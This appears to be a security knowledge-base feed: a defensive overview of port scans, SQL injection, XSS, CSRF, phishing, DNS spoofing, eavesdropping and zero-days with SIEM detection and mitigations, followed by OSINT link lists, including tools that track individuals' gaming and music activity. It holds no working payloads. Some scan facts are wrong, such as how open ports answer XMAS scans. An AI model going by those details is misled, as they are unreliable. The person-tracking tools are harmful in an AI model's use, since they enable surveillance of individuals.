#XMAS-Scan: Method: Sends a packet with all flags set (FIN, PSH, URG) except SYN and ACK, looking for unusual responses. Response: Open port: Might respond with an RST or unexpected packet, revealing its presence. Closed/filtered port: Usually replies with an RST. Advantages: Can bypass some firewalls, less common than SYN/ACK scans. Disadvantages: Slow, doesn't definitively identify open ports, might trigger security alerts. Other Scanning Techniques:
#UDP-Scan: Similar to SYN/ACK scans but uses UDP packets, faster but doesn't reveal as much information. Full Connect Scan: Establishes full TCP connections, slow but most accurate way to identify open ports. Security Solution: Firewalls, Intrusion Detection/Prevention Systems (IDS/IPS), Regular Security Audits. Detection in SIEM: Unusual connection attempts to various ports, repeated scanning activities. SIEM Solution Features: Log analysis, correlation of events, and real-time alerting for suspicious port scanning activities. Configure firewalls to block or rate limit suspicious scanning activities. Regularly audit and close unnecessary open ports. Implement intrusion detection/prevention systems to detect and block port scanning. Nmap SYN Scan: An attacker uses Nmap to perform a SYN scan, identifying open ports on a target system and potential vulnerabilities.
#SQL-Injection: Inserts malicious SQL code into web application inputs to manipulate the database, potentially retrieving sensitive data, modifying information, or executing arbitrary commands.
#Blind-SQL-Injection: Detects the presence of a vulnerability without directly observing database responses, often relying on timing-based techniques or error messages. Security Solution: Web Application Firewalls (WAFs), Input Validation, Parameterized Queries, Secure Coding Practices. Detection in SIEM: Anomalies in database activity, unexpected query patterns. SIEM Solution Features: Log analysis of database activities, pattern recognition, and correlation with other events. Use parameterized queries to prevent SQL injection. Implement input validation and sanitize user inputs. Regularly audit and patch database systems. Injecting Malicious SQL Code: Inputting SQL code into a web form to manipulate a database, potentially gaining unauthorized access or extracting sensitive information.
#Stored-XSS: Malicious scripts are permanently injected into a website's database, affecting all visitors who view the affected page.
#Reflected-XSS: Exploits user inputs like search queries or comments, reflecting the malicious script back to the user's browser for immediate execution.
#DOM-based-XSS: Modifies the Document Object Model ( #DOM) of a webpage on the client-side, often through JavaScript vulnerabilities, to inject malicious scripts. Security Solution: Content Security Policy (CSP), Input Validation, Web Application Firewalls (WAFs). Detection in SIEM: Unusual web application behavior, logs indicating malicious script injection. SIEM Solution Features: Log analysis, integration with WAFs, and detection of abnormal web application activities. Employ a Content Security Policy (CSP) to control script execution. Input validation and output encoding to prevent script injection. Regularly update and patch web applications. Script Injection: Embedding malicious scripts in user-generated content on a website, which execute in other users' browsers, stealing cookies or defacing pages.
Same-Site #CSRF: Targets actions within the same website, tricking a logged-in user into unintentionally performing unauthorized actions.
Cross-Site Request #Forgery with Token: Mitigates Same-Site CSRF by using anti-CSRF tokens that must be included in each request, preventing unauthorized actions without the correct token. Security Solution: Anti-CSRF Tokens, SameSite Cookie Attribute, Input Validation. Detection in SIEM: Unusual patterns in web requests, identification of unauthorized transactions. SIEM Solution Features: Log analysis, monitoring of web application logs, and detection of CSRF indicators. Implement anti-CSRF tokens in web applications. Use the SameSite cookie attribute to prevent CSRF attacks. Validate and secure user sessions. Unauthorized Form Submission: Forcing a logged-in user to submit a form that changes their email address or password without their knowledge.
#Phishing: Form of social engineering attack where attackers try to deceive you into revealing sensitive information, such as passwords, credit card details, or personal data.
#Spear-Phishing: Highly targeted email attacks tailored to specific individuals or organizations, often impersonating trusted entities.
#Vishing: Phishing attacks conducted over the phone, attempting to trick victims into revealing sensitive information.
#Smishing: Phishing attacks delivered via text messages (SMS), aiming to trick victims into clicking malicious links or divulging personal data. Security Solution: Email Filtering, Anti-Phishing Software, User Training and Awareness, Domainbased Message Authentication, Reporting, and Conformance (DMARC). Detection in SIEM: Analysis of email logs, and identification of phishing indicators. SIEM Solution Features: Email log analysis, correlation with threat intelligence feeds, and user behavior analytics. Implement email filtering solutions to detect and block phishing emails. Educate users through security awareness training. Use Domain-based Message Authentication, Reporting, and Conformance (DMARC) to authenticate email sources Deceptive Email: Sending emails that appear to be from a trusted source, tricking users into clicking on malicious links, or providing sensitive information.
#DNS-Spoofing: Redirects users to malicious websites by altering DNS responses, often using techniques like ARP spoofing.
#DNS-Cache-Poisoning: Exploits vulnerabilities in DNS servers to store incorrect information, directing users to unintended destinations. Security Solution: DNS Security Extensions (DNSSEC), DNS Filtering, Regular DNS Monitoring. Detection in SIEM: Unusual DNS responses, and unexpected changes in DNS records. SIEM Solution Features: DNS log analysis, real-time monitoring, and integration with DNS security solutions. Implement DNS Security Extensions (DNSSEC) to authenticate DNS responses. Regularly monitor and audit DNS configurations. Use DNS filtering services to detect and block malicious domains. Scenario 1: Direct Spoofing: The Attacker: An attacker positions themselves between your computer and the internet's DNS servers. Intercepting Your Request: When you type "an url" and your computer queries the DNS server, the attacker intercepts the request. Sending False Information: The attacker sends you a fake response claiming "that url" has a different IP address (attacker's own server). Misdirected Visit: Your computer, trusting the response, connects to the attacker's server instead of the real bank website. Data Theft: The attacker's website might look like the real bank, capturing your login credentials or other sensitive information. Scenario 2: DNS Cache Poisoning: Targeting the DNS Server: The attacker exploits a vulnerability in a DNS server and injects false information about "an url" into its cache. Widespread Impact: Now, anyone using this DNS server (potentially many users) is directed to the attacker's server whenever they try to access the bank website. Similar Consequences: Just like in direct spoofing, users unknowingly visit the attacker's website, potentially compromising their information. Key Takeaways: Both scenarios lead users to malicious websites instead of the intended ones. Spoofing can be targeted (Scenario 1) or widespread (Scenario 2) depending on the attack method. Staying vigilant and using secure websites with HTTPS encryption can help mitigate these risks.
#Passive-Eavesdropping: Intercepts data without interfering with the communication, typically targeting unencrypted channels.
Active #Eavesdropping: Injects devices or modified packets into the communication, potentially disrupting it while gathering information. Security Solution: Encryption (SSL/TLS, VPNs), Secure Wi-Fi Protocols (WPA3), Network Monitoring Tools.
Detection in SIEM: Monitoring for unauthorized interception, and analyzing network traffic for signs of #eavesdropping. SIEM Solution Features: Network traffic analysis, intrusion detection, and monitoring for unusual network behavior. Use encryption (SSL/TLS, VPNs) to secure sensitive communication. Regularly monitor and audit network traffic for unusual patterns. Implement secure Wi-Fi protocols and strong access controls. Unauthorized Wi-Fi Interception: Capturing unencrypted Wi-Fi traffic using tools like Wireshark to eavesdrop on sensitive data, such as login credentials.
Attacks that exploit #Zero-Day #vulnerabilities in software or systems before the vendor releases a patch, making them particularly dangerous as there's no immediate defense. Security Solution: Intrusion Detection/Prevention Systems (IDS/IPS), Endpoint Protection (Antivirus, EDR), Regular Software Patching, Vulnerability Scanning. Detection in SIEM: Anomalies in system or application logs, patterns consistent with known exploit techniques. SIEM Solution Features: Log analysis, correlation with threat intelligence feeds, and behavior analytics to identify suspicious activities. Regularly update and patch software to address known vulnerabilities. Employ intrusion detection/prevention systems to detect and block suspicious activities. Implement application firewalls to filter and monitor incoming traffic. Exploiting Unknown Vulnerability: Leveraging a previously undisclosed vulnerability in a software application before a patch is released, allowing unauthorized access or system manipulation]]>projects/cti/detection-mitigation-common-attacks.htmlProjects/cti/detection-mitigation-common-attacks.mdTue, 28 Apr 2026 12:37:36 GMTprojects/cti/ciberguerra-ia-infraestructuras-criticas.htmlProjects/cti/ciberguerra-ia-infraestructuras-criticas.mdTue, 28 Apr 2026 12:37:36 GMTprojects/cti/ems-stride-mitre-attack.htmlProjects/cti/ems-stride-mitre-attack.mdTue, 28 Apr 2026 12:37:36 GMTSalt Typhoon telecom hack. Their review of the Summer 2023 Microsoft Exchange Online Intrusion led to real change at Microsoft
Stargate Project: OpenAI announces $500B AI infrastructure project with $100B deploying immediately. Oracle involvement raises surveillance concerns This week's roundup highlights several trends: SSL VPN risk: FortiOS CVE-2024-55591 reinforces the argument against exposing SSL VPNs Supply chain risk: Subaru STARLINK and MasterCard DNS errors show systemic third-party weaknesses Privacy erosion: 0-click Signal deanonymization via CDN caching demonstrates novel side-channel attacks Red team tooling: Multiple new C2 frameworks and loaders indicate active development in offensive tooling CSRB disbanded during active Salt Typhoon investigation FortiOS authentication bypass (CVE-2024-55591) with PoC available 0-click deanonymization attack affecting Signal, Discord and other platforms MasterCard DNS typo (akam.ne vs akam.net) unnoticed for years 8 new offensive tools and PoCs released Sources linked inline throughout the content sections ]]>projects/cti/resumen-semanal-ciberseguridad.htmlProjects/cti/resumen-semanal-ciberseguridad.mdTue, 28 Apr 2026 12:37:36 GMTprojects/doctrina/ec-council-ctia-cert.htmlProjects/doctrina/ec-council-ctia-cert.mdTue, 28 Apr 2026 12:37:36 GMTprompts/biblioteca-de-prompts-para-reportes-cti-y-threat-hunting.htmlPrompts/biblioteca-de-prompts-para-reportes-cti-y-threat-hunting.mdTue, 28 Apr 2026 12:37:36 GMTosint-references-master. Concepto unico = nota propia. Live Cyber Threat Maps helps to know attacks carried out in visualized format.
Bitdefender Threat Map - Cyberthreat Real Time Map by Bitdefender.
BunkerWeb Live Cyber Attack Threat Map - Live cyber attack blocked by BunkerWeb, the open source and next generation Web Application Firewall.
Check Point Live Cyber Threat Map - Explore the top cyber threats of 2025, including ransomware, infostealers, and cloud vulnerabilities.
Cisco Talos Intelligence -
Fortiguard Labs - FortiGuard Outbreak Alerts provides key information about on-going cybersecurity attack with significant ramifications affecting numerous companies, organizations and industries.
HCL Threat Map - Cyber Threat Map by HCLTech.
IBM X-Force Exchange Current Malicious Activity -
Imperva Live Threat Map - A real-time global view of DDoS attacks, hacking attempts, and bot assaults mitigated by Imperva security services.
Kaspersky Cyberthreat live Map - Find out if you are under cyber-attack here.
LIONIC Cyber Threat Map -
NETSCOUT Cyber Threat Map - Real-Time DDoS Attack Map
Radware Live Cyber Threat Map - Radware's Live Threat Map presents near real-time information about cyberattacks as they occur, based on our global threat deception network.
Secure Gateway Live Cyber Threat Map -
Thale's Cyberthreat Map - Discover cybersecurity trends with Thales' Cyberthreat map. Explore targeted areas, frequent attacks, affected sectors, and prevalent malware.
ThreatsEye | Live Cyber Threat Map - Real-time visualization of global cyber attacks and threats. Monitor live cyber security incidents, attack origins, targets, and threat categories worldwide.
World Monitor Tech - Live cyber threat intelligence dashboard combining CISA advisories, active malware campaigns, CVE feeds, and global cyber event heatmaps alongside geopolitical and military context.
Zscaler Global Threat Map Dashboard - Illustrates those we've seen in the past 24 hours, consisting of threats detected by our antivirus engines, malware and advanced persistent threats. ]]>projects/cti/live-cyber-threat-maps.htmlProjects/cti/live-cyber-threat-maps.mdTue, 28 Apr 2026 12:11:14 GMTosint-references-master. Concepto unico = nota propia.
lol_monitor - Tool for real-time tracking of LoL (League of Legends) players gaming activities including detection when a user starts or finishes a match with support for email alerts, CSV logging, playtime stats and more
psn_monitor - Tool for real-time tracking of Sony Playstation (PSN) players gaming activities including detection when a user gets online/offline or plays games with support for email alerts, CSV logging, playtime stats and more
steam_monitor - Tool for real-time tracking of Steam players' gaming activities including detection when a user gets online/offline or plays games with support for email alerts, CSV logging, playtime stats and more
xbox_monitor - Tool for real-time tracking of Xbox Live players gaming activities including detection when a user gets online/offline or plays games with support for email alerts, CSV logging, playtime stats and more ]]>projects/osint-references/gaming-platforms.htmlProjects/osint-references/gaming-platforms.mdTue, 28 Apr 2026 12:11:14 GMTosint-references-master. Concepto unico = nota propia.
lastfm_monitor - Tool for real-time tracking of Last.fm users' listening activity including detection when user gets online & offline, pauses or resumes playback, all played songs, its duration, skipped songs, with optional auto-play, email alerts, CSV logging, session stats and more
spotify_profile_monitor - Tool for real-time tracking of Spotify users' activities and profile changes, including playlists, with support for email alerts, CSV logging, showing media in the terminal, detection of profile picture changes and more
spotify_monitor - Tool for real-time tracking of Spotify friends' listening activity including detection when user gets online & offline, played songs, its duration, skipped songs, with optional auto-play, email alerts, CSV logging, session stats and more ]]>projects/osint-references/music-streaming-services.htmlProjects/osint-references/music-streaming-services.mdTue, 28 Apr 2026 12:11:14 GMTosint-references-master. Concepto unico = nota propia.
Amazing mind reader reveals his ‘gift’
Bendobrown
Data to Go
SANS OSINT Summit 2021 (Playlist)
See how easily freaks can take over your life ]]>projects/osint-references/osint-videos.htmlProjects/osint-references/osint-videos.mdTue, 28 Apr 2026 12:11:14 GMTosint-references-master. Concepto unico = nota propia.
Aware-online.com - Curated collection of OSINT tools and methodologies for investigations.
Bellingcat's Online Investigation Toolkit
Bellingcat Online Researcher Survey: Tool Wishes — Wishlist of OSINT tools from a February Bellingcat survey.
Cipherstick - Free OSINT Puzzles - No Account Needed!
OSINT Dojo
OSINT Belarus
These Are the Tools Open Source Researchers Say They Need — Results of a survey Bellingcat conducted in February 2022.
OSINT Updates - a free weekly newsletter for OSINTers ]]>projects/osint-references/other-osint-resources.htmlProjects/osint-references/other-osint-resources.mdTue, 28 Apr 2026 12:11:14 GMTosint-references-master. Concepto unico = nota propia.
awesome-anti-forensic by @remiflavien1
awesome-ctf by @apsdehal
awesome-forensics by @cugu
awesome-hacking by @carpedm20
awesome-honeypots by @paralax
awesome-incident-response by @meirwah
awesome-lockpicking by @fabacab
awesome-malware-analysis by @rshipp
awesome-pentest by @enaqx
awesome-privacy by @Lissy93
awesome-sec-talks by @PaulSec
awesome-security by @sbilly
awesome-threat-intelligence by @hslatman
infosec reference by @rmusser01
personal-security-checklist by @Lissy93
SecLists by @danielmiessler
security-list by @zbetcheckin ]]>projects/osint-references/related-awesome-lists.htmlProjects/osint-references/related-awesome-lists.mdTue, 28 Apr 2026 12:11:14 GMT